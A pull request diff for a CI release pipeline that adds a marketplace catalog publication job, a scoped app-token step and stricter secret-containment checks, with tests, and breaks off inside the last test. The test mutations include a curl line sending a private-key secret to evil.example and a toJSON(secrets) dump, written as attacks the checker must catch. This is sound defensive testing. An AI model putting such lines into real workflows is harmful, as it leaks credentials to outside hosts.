### PR TITLE
publish the marketplace catalog on the plugin fast lane

### DIFF
--- a/.github/scripts/check-workflow-policy.mjs
+++ b/.github/scripts/check-workflow-policy.mjs
@@ -4416,20 +4416,43 @@ export function validateCargoTestFilters(
   }
 }
 
-export function validatePluginRelease(workflows, violations) {
+export function validatePluginRelease(workflows, violations, graph) {
   const file = "plugin-release.yml";
   const workflow = workflows.get(file);
   if (!workflow) {
     violations.push(`${file} must exist`);
     return;
   }
+  const pluginChain = object(object(at(graph, "workflow_policy", "plugin_chain")).dependencies);
   const scalars = scalarStrings(workflow);
   add(violations, hasExactKeys(object(workflow.on), ["workflow_call"]), `${file} must be callable only`);
-  add(
-    violations,
-    !JSON.stringify(workflow).includes("secrets"),
-    `${file} must not receive or forward secrets: nothing is built or signed on the plugin lane`,
-  );
+  // Nothing is built or signed on the plugin lane, so it declares no callable secret surface and
+  // its caller forwards none. The one credential it may read is the marketplace app identity, and
+  // only where the scoped token is minted.
+  const marketplaceTokenIndex = list(object(object(workflow.jobs)["marketplace-publish"]).steps)
+    .findIndex(step => object(step).name === "Mint a scoped marketplace token");
+  const marketplaceIdentityKeys = new Map([
+    ["${{ secrets.MARKETPLACE_APP_ID }}", "app-id"],
+    ["${{ secrets.MARKETPLACE_APP_PRIVATE_KEY }}", "private-key"],
+  ]);
+  walk(workflow, (key, value, trail) => {
+    const mentionsSecret = key === "secrets"
+      || (typeof value === "string" && value.includes("secrets."));
+    if (!mentionsSecret) return;
+    const mintsMarketplaceIdentity = marketplaceTokenIndex >= 0
+      && trail.length === 6
+      && trail[0] === "jobs"
+      && trail[1] === "marketplace-publish"
+      && trail[2] === "steps"
+      && trail[3] === marketplaceTokenIndex
+      && trail[4] === "with"
+      && marketplaceIdentityKeys.get(value) === key;
+    add(
+      violations,
+      mintsMarketplaceIdentity,
+      `${file} must not receive or forward secrets beyond the minted marketplace app identity: nothing is built or signed on the plugin lane`,
+    );
+  });
   walk(workflow, (key, value) => {
     if (/^APPLE_/u.test(key) || (typeof value === "string" && /\bAPPLE_[A-Z0-9_]+\b/u.test(value))) {
       violations.push(`${file} must never reference Apple signing material`);
@@ -4438,9 +4461,16 @@ export function validatePluginRelease(workflows, violations) {
   const jobs = object(workflow.jobs);
   add(
     violations,
-    hasExactKeys(jobs, ["workflow-policy", "preflight", "plugin-proof", "publish", "post-publish-smoke"]),
-    `${file} must keep its exact five-job plugin lane`,
+    hasExactKeys(jobs, ["workflow-policy", ...Object.keys(pluginChain)]),
+    `${file} must keep exactly the plugin lane the release claim graph declares`,
   );
+  for (const [name, dependencies] of Object.entries(pluginChain)) {
+    add(
+      violations,
+      sameMembers(needs(object(jobs[name])), dependencies),
+      `${file} ${name} dependencies must match the release claim graph`,
+    );
+  }
   for (const [name, job] of Object.entries(jobs)) {
     const permissions = object(job).permissions;
     add(
@@ -4473,14 +4503,51 @@ export function validatePluginRelease(workflows, violations) {
   ]);
   add(
     violations,
-    sameStrings(nonCommentLines(object(jobs.publish).needs === undefined ? "" : ""), []) ||
-      JSON.stringify(object(jobs.publish).needs) === JSON.stringify(["preflight", "plugin-proof"]),
-    `${file} publish must wait on preflight and plugin proof`,
+    !scalars.some((value) => /cargo\s+(?:build|test)/u.test(value)),
+    `${file} must not build native code`,
+  );
+
+  // The catalog a host installs from is only correct once it names this release, so the plugin
+  // lane owns the same publication step the native lane does.
+  const marketplacePublish = object(jobs["marketplace-publish"]);
+  add(
+    violations,
+    marketplacePublish.environment === "marketplace-publish",
+    `${file} marketplace publication must hold its cross-repository credential in its own environment`,
+  );
+  const tokenStep = namedStep(marketplacePublish, "Mint a scoped marketplace token");
+  add(
+    violations,
+    String(tokenStep?.uses ?? "").startsWith("actions/create-github-app-token@")
+      && fullSha.test(String(tokenStep?.uses ?? "").split("@")[1] ?? "")
+      && object(tokenStep?.with).owner === "TheGreenCedar"
+      && object(tokenStep?.with).repositories === "AgentPluginMarketplace",
+    `${file} marketplace token must be a SHA-pinned app token scoped to the marketplace repository`,
+  );
+  requireStepRun(violations, file, marketplacePublish, "Point the catalog at the published release", [
+    "publish-marketplace-catalog.mjs",
+    '--version "${{ inputs.version }}"',
+  ]);
+  add(
+    violations,
+    object(marketplacePublish.outputs).marketplace_revision
+      === "${{ steps.publish.outputs.marketplace_revision }}",
+    `${file} marketplace publication must publish the revision it pushed`,
+  );
+
+  // Preflight runs before the release exists, so a revision captured there names the *previous*
+  // release. Smoke must install from the revision this run published or it proves nothing.
+  const smoke = object(jobs["post-publish-smoke"]);
+  add(
+    violations,
+    object(preflight.outputs).marketplace_revision === undefined,
+    `${file} preflight must not capture a marketplace revision that predates publication`,
   );
   add(
     violations,
-    !scalars.some((value) => /cargo\s+(?:build|test)/u.test(value)),
-    `${file} must not build native code`,
+    object(namedStep(smoke, "Prove the public marketplace install path")?.env).MARKETPLACE_REVISION
+      === "${{ needs.marketplace-publish.outputs.marketplace_revision }}",
+    `${file} post-publish smoke must install from the marketplace revision this release published`,
   );
 
   const auto = workflows.get("auto-release.yml");
@@ -4505,7 +4572,7 @@ export function validateWorkflows(workflows, graph = loadReleaseClaimGraph(repos
     violations.push(...basicWorkflowViolations(file, workflow));
   }
   validateCargoTestFilters(workflows, violations);
-  validatePluginRelease(workflows, violations);
+  validatePluginRelease(workflows, violations, graph);
   validateLockedSetupSurfaces(violations);
   validateIssueWorkflows(workflows, violations);
   validatePluginAndDraftWorkflows(workflows, violations, graph);

--- a/.github/scripts/check-workflow-policy.mjs
+++ b/.github/scripts/check-workflow-policy.mjs
@@ -4416,6 +4416,29 @@ export function validateCargoTestFilters(
   }
 }
 
+// The only secret read the plugin lane is allowed is the marketplace app identity, and only in the
+// step that mints the scoped token. Return a copy of the workflow with exactly that read removed,
+// so whatever still names the secrets context afterwards is a read nobody sanctioned. Both the key
+// and the expression must match exactly: swapping either value for a different secret leaves the
+// mention in place rather than inheriting the exemption.
+const MARKETPLACE_IDENTITY_READS = new Map([
+  ["app-id", "${{ secrets.MARKETPLACE_APP_ID }}"],
+  ["private-key", "${{ secrets.MARKETPLACE_APP_PRIVATE_KEY }}"],
+]);
+
+function withoutMarketplaceIdentity(workflow) {
+  const redacted = JSON.parse(JSON.stringify(workflow));
+  const tokenStep = namedStep(
+    object(object(redacted.jobs)["marketplace-publish"]),
+    "Mint a scoped marketplace token",
+  );
+  const inputs = object(tokenStep?.with);
+  for (const [key, expression] of MARKETPLACE_IDENTITY_READS) {
+    if (inputs[key] === expression) delete inputs[key];
+  }
+  return redacted;
+}
+
 export function validatePluginRelease(workflows, violations, graph) {
   const file = "plugin-release.yml";
   const workflow = workflows.get(file);
@@ -4429,30 +4452,18 @@ export function validatePluginRelease(workflows, violations, graph) {
   // Nothing is built or signed on the plugin lane, so it declares no callable secret surface and
   // its caller forwards none. The one credential it may read is the marketplace app identity, and
   // only where the scoped token is minted.
-  const marketplaceTokenIndex = list(object(object(workflow.jobs)["marketplace-publish"]).steps)
-    .findIndex(step => object(step).name === "Mint a scoped marketplace token");
-  const marketplaceIdentityKeys = new Map([
-    ["${{ secrets.MARKETPLACE_APP_ID }}", "app-id"],
-    ["${{ secrets.MARKETPLACE_APP_PRIVATE_KEY }}", "private-key"],
-  ]);
-  walk(workflow, (key, value, trail) => {
-    const mentionsSecret = key === "secrets"
-      || (typeof value === "string" && value.includes("secrets."));
-    if (!mentionsSecret) return;
-    const mintsMarketplaceIdentity = marketplaceTokenIndex >= 0
-      && trail.length === 6
-      && trail[0] === "jobs"
-      && trail[1] === "marketplace-publish"
-      && trail[2] === "steps"
-      && trail[3] === marketplaceTokenIndex
-      && trail[4] === "with"
-      && marketplaceIdentityKeys.get(value) === key;
-    add(
-      violations,
-      mintsMarketplaceIdentity,
-      `${file} must not receive or forward secrets beyond the minted marketplace app identity: nothing is built or signed on the plugin lane`,
-    );
-  });
+  //
+  // The rule stays a whole-workflow substring scan, no weaker than the blanket ban it replaces,
+  // because "secrets." is not the only way to reach the context: `toJSON(secrets)`,
+  // `secrets['NAME']`, a `secrets:` key, a secret smuggled through a bare array element, and
+  // `SECRETS.NAME` (contexts are case-insensitive) all name it without that substring. Instead of
+  // pattern-matching the smuggling shapes, redact the two permitted identity reads at their exact
+  // position and require the remainder to mention secrets nowhere at all.
+  add(
+    violations,
+    !/secrets/iu.test(JSON.stringify(withoutMarketplaceIdentity(workflow))),
+    `${file} must not receive or forward secrets beyond the minted marketplace app identity: nothing is built or signed on the plugin lane`,
+  );
   walk(workflow, (key, value) => {
     if (/^APPLE_/u.test(key) || (typeof value === "string" && /\bAPPLE_[A-Z0-9_]+\b/u.test(value))) {
       violations.push(`${file} must never reference Apple signing material`);

--- a/.github/scripts/check-workflow-policy.test.mjs
+++ b/.github/scripts/check-workflow-policy.test.mjs
@@ -2372,12 +2372,6 @@ test("the plugin lane publishes the catalog it then smoke-installs", async (t) =
     ["catalog publication hides the revision it pushed", workflow => {
       delete workflow.jobs["marketplace-publish"].outputs;
     }, /marketplace publication must publish the revision it pushed/u],
-    ["a secret leaks outside the token step", workflow => {
-      catalogStep(workflow).env.APP_ID = "${{ secrets.MARKETPLACE_APP_ID }}";
-    }, /must not receive or forward secrets beyond the minted marketplace app identity/u],
-    ["the lane opens a callable secret surface", workflow => {
-      workflow.on.workflow_call.secrets = { MARKETPLACE_APP_ID: { required: true } };
-    }, /must not receive or forward secrets beyond the minted marketplace app identity/u],
   ];
   for (const [name, mutate, expected] of mutations) {
     await t.test(name, () => {
@@ -2386,6 +2380,62 @@ test("the plugin lane publishes the catalog it then smoke-installs", async (t) =
       const violations = validateWorkflows(workflows);
       assert.notDeepEqual(violations, []);
       assert.match(violations.join("\n"), expected);
+    });
+  }
+});
+
+// The lane's advertised security property is that it receives and forwards no secrets, and the
+// marketplace token step is the single sanctioned exception. `secrets.NAME` is only one of the
+// ways a GitHub expression reaches that context, so a suite that only mutates the dot form proves
+// nothing: every shape below is valid GitHub and must trip the rule, or the exemption is a hole.
+test("the plugin lane's secret containment holds for every way of naming the context", async (t) => {
+  assert.deepEqual(validateWorkflows(loadWorkflows()), []);
+  const file = "plugin-release.yml";
+  const forbidden = /must not receive or forward secrets beyond the minted marketplace app identity/u;
+  const marketplaceJob = workflow => workflow.jobs["marketplace-publish"];
+  const smokeStep = workflow =>
+    draftStep(workflow.jobs["post-publish-smoke"], "Prove the public marketplace install path");
+  const tokenStep = workflow => draftStep(marketplaceJob(workflow), "Mint a scoped marketplace token");
+  const catalogStep = workflow =>
+    draftStep(marketplaceJob(workflow), "Point the catalog at the published release");
+  const mutations = [
+    ["a secret leaks outside the token step", workflow => {
+      catalogStep(workflow).env.APP_ID = "${{ secrets.MARKETPLACE_APP_ID }}";
+    }],
+    ["the lane opens a callable secret surface", workflow => {
+      workflow.on.workflow_call.secrets = { MARKETPLACE_APP_ID: { required: true } };
+    }],
+    ["the entire secret context is dumped into the catalog step", workflow => {
+      catalogStep(workflow).env.LEAK = "${{ toJSON(secrets) }}";
+    }],
+    ["a secret is read by bracket index instead of by dot", workflow => {
+      smokeStep(workflow).env.LEAK = "${{ secrets['MARKETPLACE_APP_PRIVATE_KEY'] }}";
+    }],
+    ["the publish job exfiltrates a bracket-indexed secret", workflow => {
+      const step = draftStep(workflow.jobs.publish, "Publish the plugin release");
+      step.run = `${step.run}\ncurl -d "\${{ secrets['MARKETPLACE_APP_PRIVATE_KEY'] }}" https://evil.example\n`;
+    }],
+    ["the context is spelled in the other case GitHub expressions accept", workflow => {
+      smokeStep(workflow).env.LEAK = "${{ SECRETS.MARKETPLACE_APP_ID }}";
+    }],
+    ["a secret hides in a bare list element rather than a mapping value", workflow => {
+      workflow.jobs["post-publish-smoke"].strategy = {
+        matrix: { leak: ["${{ secrets.MARKETPLACE_APP_PRIVATE_KEY }}"] },
+      };
+    }],
+    ["the token step mints from a credential nobody scoped", workflow => {
+      tokenStep(workflow).with["private-key"] = "${{ secrets['SOME_OTHER_KEY'] }}";
+    }],
+    ["the token step's own read moves to a step that only borrows its name", workflow => {
+      const job = marketplaceJob(workflow);
+      job.steps.push(structuredClone(tokenStep(workflow)));
+    }],
+  ];
+  for (const [name, mutate] of mutations) {
+    await t.test(name, () => {
+      const workflows = loadWorkflows();
+      mutate(workflows.get(file));
+      assert.match(validateWorkflows(workflows).join("\n"), forbidden);
     });
   }
 });

--- a/.github/scripts/check-workflow-policy.test.mjs
+++ b/.github/scripts/check-workflow-policy.test.mjs
@@ -2325,3 +2325,98 @@ test("release policy rejects manifest producer, trusted-map, and publication byp
     assert.notDeepEqual(validateWorkflows(workflows), [], label);
   }
 });
+
+test("the plugin lane publishes the catalog it then smoke-installs", async (t) => {
+  assert.deepEqual(validateWorkflows(loadWorkflows()), []);
+  const file = "plugin-release.yml";
+  const smokeStep = workflow =>
+    draftStep(workflow.jobs["post-publish-smoke"], "Prove the public marketplace install path");
+  const tokenStep = workflow =>
+    draftStep(workflow.jobs["marketplace-publish"], "Mint a scoped marketplace token");
+  const catalogStep = workflow =>
+    draftStep(workflow.jobs["marketplace-publish"], "Point the catalog at the published release");
+  const mutations = [
+    ["smoke installs the revision preflight saw before publication", workflow => {
+      workflow.jobs.preflight.outputs.marketplace_revision
+        = "${{ steps.marketplace.outputs.marketplace_revision }}";
+      smokeStep(workflow).env.MARKETPLACE_REVISION
+        = "${{ needs.preflight.outputs.marketplace_revision }}";
+    }, /post-publish smoke must install from the marketplace revision this release published/u],
+    ["preflight resurrects a pre-publication revision", workflow => {
+      workflow.jobs.preflight.outputs.marketplace_revision
+        = "${{ steps.marketplace.outputs.marketplace_revision }}";
+    }, /preflight must not capture a marketplace revision that predates publication/u],
+    ["catalog publication is dropped from the lane", workflow => {
+      delete workflow.jobs["marketplace-publish"];
+      workflow.jobs["post-publish-smoke"].needs = ["preflight", "publish"];
+    }, /must keep exactly the plugin lane the release claim graph declares/u],
+    ["smoke stops waiting on catalog publication", workflow => {
+      workflow.jobs["post-publish-smoke"].needs = ["preflight", "publish"];
+    }, /post-publish-smoke dependencies must match the release claim graph/u],
+    ["catalog publication races the release it advertises", workflow => {
+      workflow.jobs["marketplace-publish"].needs = ["preflight"];
+    }, /marketplace-publish dependencies must match the release claim graph/u],
+    ["catalog publication loses its credential environment", workflow => {
+      delete workflow.jobs["marketplace-publish"].environment;
+    }, /marketplace publication must hold its cross-repository credential in its own environment/u],
+    ["the marketplace token is unpinned", workflow => {
+      tokenStep(workflow).uses = "actions/create-github-app-token@v1";
+    }, /marketplace token must be a SHA-pinned app token scoped to the marketplace repository/u],
+    ["the marketplace token widens beyond the catalog repository", workflow => {
+      tokenStep(workflow).with.repositories = "CodeStory";
+    }, /marketplace token must be a SHA-pinned app token scoped to the marketplace repository/u],
+    ["the catalog is pointed at an unbound version", workflow => {
+      const step = catalogStep(workflow);
+      step.run = step.run.replace('--version "${{ inputs.version }}"', '--version "$LATEST"');
+    }, /Point the catalog at the published release must run --version/u],
+    ["catalog publication hides the revision it pushed", workflow => {
+      delete workflow.jobs["marketplace-publish"].outputs;
+    }, /marketplace publication must publish the revision it pushed/u],
+    ["a secret leaks outside the token step", workflow => {
+      catalogStep(workflow).env.APP_ID = "${{ secrets.MARKETPLACE_APP_ID }}";
+    }, /must not receive or forward secrets beyond the minted marketplace app identity/u],
+    ["the lane opens a callable secret surface", workflow => {
+      workflow.on.workflow_call.secrets = { MARKETPLACE_APP_ID: { required: true } };
+    }, /must not receive or forward secrets beyond the minted marketplace app identity/u],
+  ];
+  for (const [name, mutate, expected] of mutations) {
+    await t.test(name, () => {
+      const workflows = loadWorkflows();
+      mutate(workflows.get(file));
+      const violations = validateWorkflows(workflows);
+      assert.notDeepEqual(violations, []);
+      assert.match(violations.join("\n"), expected);
+    });
+  }
+});
+
+test("the plugin lane still forbids building, signing, and forwarded secrets", async (t) => {
+  assert.deepEqual(validateWorkflows(loadWorkflows()), []);
+  const mutations = [
+    ["auto-release forwards secrets to the plugin lane", workflows => {
+      workflows.get("auto-release.yml").jobs["plugin-release"].secrets = "inherit";
+    }, /auto-release\.yml must route the plugin lane without forwarding secrets/u],
+    ["the plugin lane reaches for Apple signing material", workflows => {
+      draftStep(
+        workflows.get("plugin-release.yml").jobs["marketplace-publish"],
+        "Point the catalog at the published release",
+      ).env.APPLE_ID = "signing@example.com";
+    }, /must never reference Apple signing material/u],
+    ["the plugin lane builds native code", workflows => {
+      const step = draftStep(
+        workflows.get("plugin-release.yml").jobs["plugin-proof"],
+        "Provision the pinned CLI end to end",
+      );
+      step.run = `${step.run}\ncargo build --locked -p codestory-cli\n`;
+    }, /must not build native code/u],
+  ];
+  for (const [name, mutate, expected] of mutations) {
+    await t.test(name, () => {
+      const workflows = loadWorkflows();
+      mutate(workflows);
+      const violations = validateWorkflows(workflows);
+      assert.notDeepEqual(violations, []);
+      assert.match(violations.join("\n"), expected);
+    });
+  }
+});

--- a/.github/workflows/plugin-release.yml
+++ b/.github/workflows/plugin-release.yml
@@ -39,7 +39,6 @@ jobs:
     timeout-minutes: 15
     outputs:
       pinned_cli_version: ${{ steps.pin.outputs.pinned_cli_version }}
-      marketplace_revision: ${{ steps.marketplace.outputs.marketplace_revision }}
     steps:
       - uses: actions/checkout@v5
         with:
@@ -128,15 +127,6 @@ jobs:
           node .github/scripts/extract-codestory-release-notes.mjs --version "${{ inputs.version }}" > /tmp/plugin-release-notes.md
           test -s /tmp/plugin-release-notes.md
 
-      - name: Capture the live marketplace revision
-        id: marketplace
-        shell: bash
-        run: |
-          set -euo pipefail
-          revision="$(git ls-remote https://github.com/TheGreenCedar/AgentPluginMarketplace.git refs/heads/main | cut -f1)"
-          test -n "$revision"
-          echo "marketplace_revision=$revision" >> "$GITHUB_OUTPUT"
-
   plugin-proof:
     needs: preflight
     strategy:
@@ -193,8 +183,43 @@ jobs:
             --title "CodeStory plugin ${{ inputs.version }}" \
             --notes-file /tmp/plugin-release-notes.md
 
-  post-publish-smoke:
+  # The catalog is what a host installs from, so the plugin lane publishes it too. Without this the
+  # smoke below would resolve the previous release and fail after the tag is already irreversible.
+  marketplace-publish:
     needs: [preflight, publish]
+    runs-on: ubuntu-latest
+    timeout-minutes: 10
+    environment: marketplace-publish
+    outputs:
+      marketplace_revision: ${{ steps.publish.outputs.marketplace_revision }}
+    steps:
+      - uses: actions/checkout@v5
+
+      - name: Mint a scoped marketplace token
+        id: token
+        uses: actions/create-github-app-token@67e27a7eb7db372a1c61a7f9bdab8699e9ee57f7 # v1.11.3
+        with:
+          app-id: ${{ secrets.MARKETPLACE_APP_ID }}
+          private-key: ${{ secrets.MARKETPLACE_APP_PRIVATE_KEY }}
+          owner: TheGreenCedar
+          repositories: AgentPluginMarketplace
+
+      # Publication already happened, so a failure here leaves the catalog serving the previous
+      # release rather than a release that does not exist. marketplace-sync.yml recovers it.
+      - name: Point the catalog at the published release
+        id: publish
+        env:
+          GH_TOKEN: ${{ steps.token.outputs.token }}
+        run: |
+          set -euo pipefail
+          node .github/scripts/publish-marketplace-catalog.mjs \
+            --source-repository "$GITHUB_WORKSPACE" \
+            --commit "$GITHUB_SHA" \
+            --version "${{ inputs.version }}" \
+            --github-output "$GITHUB_OUTPUT"
+
+  post-publish-smoke:
+    needs: [preflight, publish, marketplace-publish]
     runs-on: ubuntu-latest
     timeout-minutes: 30
     steps:
@@ -203,7 +228,7 @@ jobs:
       - name: Prove the public marketplace install path
         env:
           CODEX_CLI_VERSION: "0.144.5"
-          MARKETPLACE_REVISION: ${{ needs.preflight.outputs.marketplace_revision }}
+          MARKETPLACE_REVISION: ${{ needs.marketplace-publish.outputs.marketplace_revision }}
         run: |
           set -euo pipefail
           install_root="$RUNNER_TEMP/codestory-marketplace-postpublish"

--- a/AGENTS.md
+++ b/AGENTS.md
@@ -237,9 +237,10 @@ adapter to compensate for incorrect upstream state.
   hardware, post-publish, installed-runtime, and live behavior evidence for the
   claims being shipped. A merge, tag, or downloadable archive alone is not
   release completion.
-- The release workflow owns marketplace publication. Its `marketplace-publish`
-  job points `TheGreenCedar/AgentPluginMarketplace` at the published commit
-  after the release exists, and post-publish smoke proves that catalog. Do not
+- Both release lanes own marketplace publication. The `marketplace-publish` job
+  in `release.yml` and in `plugin-release.yml` points
+  `TheGreenCedar/AgentPluginMarketplace` at the published commit after the
+  release exists, and post-publish smoke proves that catalog. Do not
   hand-edit the catalog before a release; preflight proves the install path
   against a candidate-pinned fixture and no longer requires the live catalog to
   match an unreleased commit. If the catalog push fails, the release is still

--- a/benchmarks/release-evidence/fixtures/candidate.json
+++ b/benchmarks/release-evidence/fixtures/candidate.json
@@ -62,7 +62,7 @@
   },
   "release_claims": {
     "graph_schema": "codestory.release-claims/v1",
-    "graph_sha256": "5a89e6d4445cb76117cf98d09c2cdd09184abeb7488d58009d5c90d84f401d3d",
+    "graph_sha256": "5e61e808ffb6edad30699c701b3f8c4182ddfeb3f7d83ba49bb41b1ce948aacb",
     "observed_at": "2026-07-21T02:13:20.738Z",
     "expires_at": "2026-07-22T02:13:20.738Z",
     "requested_claims": [
@@ -85,7 +85,7 @@
         "type": "performance",
         "tier": "live_behavior",
         "status": "measured",
-        "graph_sha256": "5a89e6d4445cb76117cf98d09c2cdd09184abeb7488d58009d5c90d84f401d3d",
+        "graph_sha256": "5e61e808ffb6edad30699c701b3f8c4182ddfeb3f7d83ba49bb41b1ce948aacb",
         "observed_at": "2026-07-21T02:13:20.738Z",
         "expires_at": "2026-07-22T02:13:20.738Z",
         "identity": {
@@ -106,7 +106,7 @@
         "type": "answer_quality",
         "tier": "answer_quality",
         "status": "pass",
-        "graph_sha256": "5a89e6d4445cb76117cf98d09c2cdd09184abeb7488d58009d5c90d84f401d3d",
+        "graph_sha256": "5e61e808ffb6edad30699c701b3f8c4182ddfeb3f7d83ba49bb41b1ce948aacb",
         "observed_at": "2026-07-21T02:13:20.738Z",
         "expires_at": "2026-07-22T02:13:20.738Z",
         "identity": {

--- a/benchmarks/release-evidence/fixtures/report.json
+++ b/benchmarks/release-evidence/fixtures/report.json
@@ -7,7 +7,7 @@
   "baseline_id": "ci-contract-v1@1111111111111111111111111111111111111111",
   "baseline_sha256": "0bbbe6dd8b4000151edf7b1270959d08e94e08db876e7f2372b25613e0f237c1",
   "candidate_path": "benchmarks/release-evidence/fixtures/candidate.json",
-  "candidate_sha256": "421e78b9ed58ff3c15b5f907d61f06520bd19ddf70e104dcd2b1c272a05a7309",
+  "candidate_sha256": "ba277f51c4079712fd75ef1ead662198645d70074bb6b717b1bca7336968a7f1",
   "artifact_paths": [
     {
       "path": "candidate-stats.json",
@@ -26,7 +26,7 @@
       "type": "performance",
       "tier": "live_behavior",
       "status": "pass",
-      "graph_sha256": "5a89e6d4445cb76117cf98d09c2cdd09184abeb7488d58009d5c90d84f401d3d",
+      "graph_sha256": "5e61e808ffb6edad30699c701b3f8c4182ddfeb3f7d83ba49bb41b1ce948aacb",
       "observed_at": "2026-07-21T02:13:20.738Z",
       "expires_at": "2026-07-22T02:13:20.738Z",
       "identity": {
@@ -47,7 +47,7 @@
       "type": "answer_quality",
       "tier": "answer_quality",
       "status": "pass",
-      "graph_sha256": "5a89e6d4445cb76117cf98d09c2cdd09184abeb7488d58009d5c90d84f401d3d",
+      "graph_sha256": "5e61e808ffb6edad30699c701b3f8c4182ddfeb3f7d83ba49bb41b1ce948aacb",
       "observed_at": "2026-07-21T02:13:20.738Z",
       "expires_at": "2026-07-22T02:13:20.738Z",
       "identity": {
@@ -69,7 +69,7 @@
     "schema": "codestory.release-claim-evaluation/v1",
     "status": "pass",
     "graph_schema": "codestory.release-claims/v1",
-    "graph_sha256": "5a89e6d4445cb76117cf98d09c2cdd09184abeb7488d58009d5c90d84f401d3d",
+    "graph_sha256": "5e61e808ffb6edad30699c701b3f8c4182ddfeb3f7d83ba49bb41b1ce948aacb",
     "evidence_selection": "all_matching_rows_must_pass",
     "expected_commit": "2222222222222222222222222222222222222222",
     "evaluated_at": "2026-07-21T02:13:20.738Z",

--- a/release-claims.json
+++ b/release-claims.json
@@ -1090,6 +1090,29 @@
         ]
       }
     },
+    "plugin_chain": {
+      "dependencies": {
+        "preflight": [
+          "workflow-policy"
+        ],
+        "plugin-proof": [
+          "preflight"
+        ],
+        "publish": [
+          "preflight",
+          "plugin-proof"
+        ],
+        "marketplace-publish": [
+          "preflight",
+          "publish"
+        ],
+        "post-publish-smoke": [
+          "preflight",
+          "publish",
+          "marketplace-publish"
+        ]
+      }
+    },
     "artifact_workflows": [
       "source-proof.yml",
       "release-candidate-evidence.yml",

--- a/scripts/codestory-release-claims.mjs
+++ b/scripts/codestory-release-claims.mjs
@@ -308,6 +308,77 @@ function validatePublicSupport(graph, packageTargets, cellGroups) {
   }
 }
 
+// The plugin lane's job DAG lives in the claim graph rather than in check-workflow-policy.mjs, and
+// the checker only asserts that the workflow's `needs:` match whatever this data says. That makes
+// this the only place left that can tell a real ordering contract from an empty one: with the
+// dependency lists blanked out, both gates would pass while `gh release create` ran with the
+// release-authority checks and the whole plugin-proof matrix detached from it.
+const PLUGIN_CHAIN_ROOT = "workflow-policy";
+const PLUGIN_CHAIN_ORDER = [
+  // Tagging is irreversible, so everything that can still refuse the release runs before it.
+  ["publish", "preflight"],
+  ["publish", "plugin-proof"],
+  // The catalog and the install proof that reads it only mean anything once the release exists.
+  ["marketplace-publish", "publish"],
+  ["post-publish-smoke", "publish"],
+  ["post-publish-smoke", "marketplace-publish"],
+];
+
+function pluginChainAncestors(dependencies, job, seen = new Set()) {
+  for (const dependency of dependencies[job] ?? []) {
+    if (seen.has(dependency)) continue;
+    seen.add(dependency);
+    pluginChainAncestors(dependencies, dependency, seen);
+  }
+  return seen;
+}
+
+function validatePluginChain(value) {
+  const chain = object(value, "workflow_policy.plugin_chain");
+  const dependencies = object(chain.dependencies, "workflow_policy.plugin_chain.dependencies");
+  const jobs = Object.keys(dependencies);
+  if (jobs.length === 0) {
+    fail("workflow_policy.plugin_chain.dependencies must declare at least one job");
+  }
+  const declared = new Set([PLUGIN_CHAIN_ROOT, ...jobs]);
+  // Null-prototype so a job named after an Object member cannot smuggle a dependency list past the
+  // reachability walk below.
+  const resolved = Object.create(null);
+  for (const job of jobs) {
+    nonEmptyText(job, "workflow_policy.plugin_chain.dependencies job");
+    if (job === PLUGIN_CHAIN_ROOT) {
+      fail(`workflow_policy.plugin_chain.dependencies must not redeclare ${PLUGIN_CHAIN_ROOT}`);
+    }
+    resolved[job] = stringArray(
+      dependencies[job],
+      `workflow_policy.plugin_chain.dependencies.${job}`,
+      { nonEmpty: true },
+    );
+    for (const dependency of resolved[job]) {
+      if (!declared.has(dependency)) {
+        fail(`workflow_policy.plugin_chain.dependencies.${job} names undeclared job ${dependency}`);
+      }
+    }
+  }
+  for (const job of jobs) {
+    const ancestors = pluginChainAncestors(resolved, job);
+    if (ancestors.has(job)) {
+      fail(`workflow_policy.plugin_chain.dependencies.${job} cannot depend on itself`);
+    }
+    if (!ancestors.has(PLUGIN_CHAIN_ROOT)) {
+      fail(`workflow_policy.plugin_chain.dependencies.${job} must run behind ${PLUGIN_CHAIN_ROOT}`);
+    }
+  }
+  for (const [job, required] of PLUGIN_CHAIN_ORDER) {
+    if (!declared.has(job) || !declared.has(required)) {
+      fail(`workflow_policy.plugin_chain.dependencies must declare ${job} and ${required}`);
+    }
+    if (!pluginChainAncestors(resolved, job).has(required)) {
+      fail(`workflow_policy.plugin_chain.dependencies.${job} must run behind ${required}`);
+    }
+  }
+}
+
 export function canonicalReleaseClaimValue(value) {
   if (Array.isArray(value)) return value.map(canonicalReleaseClaimValue);
   if (value !== null && typeof value === "object") {
@@ -649,6 +720,7 @@ export function validateReleaseClaimGraph(graph) {
       fail("optional release evidence must not block a standard release job");
     }
   }
+  validatePluginChain(policy.plugin_chain);
   stringArray(policy.artifact_workflows, "workflow_policy.artifact_workflows", { nonEmpty: true });
   const promotion = object(policy.promotion, "workflow_policy.promotion");
   nonEmptyText(promotion.source_branch, "workflow_policy.promotion.source_branch");

--- a/scripts/tests/codestory-release-claims.test.mjs
+++ b/scripts/tests/codestory-release-claims.test.mjs
@@ -290,6 +290,57 @@ test("graph rejects ambiguous dependencies and unstructured proof lanes", () => 
   }
 });
 
+// check-workflow-policy.mjs asserts only that plugin-release.yml's `needs:` match this data, so a
+// chain that parses but orders nothing would let both gates pass while `gh release create` ran
+// detached from the release-authority checks and the plugin-proof matrix. Every mutation below
+// leaves the workflow and the graph agreeing with each other; only the schema can refuse them.
+test("the plugin chain must order the lane, not merely name it", async (t) => {
+  const chain = (graphValue) => graphValue.workflow_policy.plugin_chain.dependencies;
+  const mutations = [
+    ["the ordering contract is dropped wholesale", (mutated) => {
+      delete mutated.workflow_policy.plugin_chain;
+    }, /workflow_policy\.plugin_chain must be an object/u],
+    ["the dependencies key is not a mapping", (mutated) => {
+      mutated.workflow_policy.plugin_chain.dependencies = [];
+    }, /workflow_policy\.plugin_chain\.dependencies must be an object/u],
+    ["the lane declares no jobs at all", (mutated) => {
+      mutated.workflow_policy.plugin_chain.dependencies = {};
+    }, /plugin_chain\.dependencies must declare at least one job/u],
+    ["tagging is cut loose from every gate", (mutated) => {
+      chain(mutated).publish = [];
+    }, /plugin_chain\.dependencies\.publish must be a non-empty array/u],
+    ["the install proof is cut loose from every gate", (mutated) => {
+      chain(mutated)["post-publish-smoke"] = [];
+    }, /plugin_chain\.dependencies\.post-publish-smoke must be a non-empty array/u],
+    ["tagging stops waiting on the plugin proof", (mutated) => {
+      chain(mutated).publish = ["preflight"];
+    }, /plugin_chain\.dependencies\.publish must run behind plugin-proof/u],
+    ["the plugin proof is deleted from the lane", (mutated) => {
+      delete chain(mutated)["plugin-proof"];
+      chain(mutated).publish = ["preflight"];
+    }, /plugin_chain\.dependencies must declare publish and plugin-proof/u],
